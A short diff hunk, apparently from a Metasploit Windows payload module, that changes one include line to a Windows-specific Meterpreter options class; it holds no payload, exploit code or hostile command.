@@ -8,7 +8,7 @@ module MetasploitModule
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
-  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MeterpreterOptions::Windows
 
   def initialize(info = {})
     super(
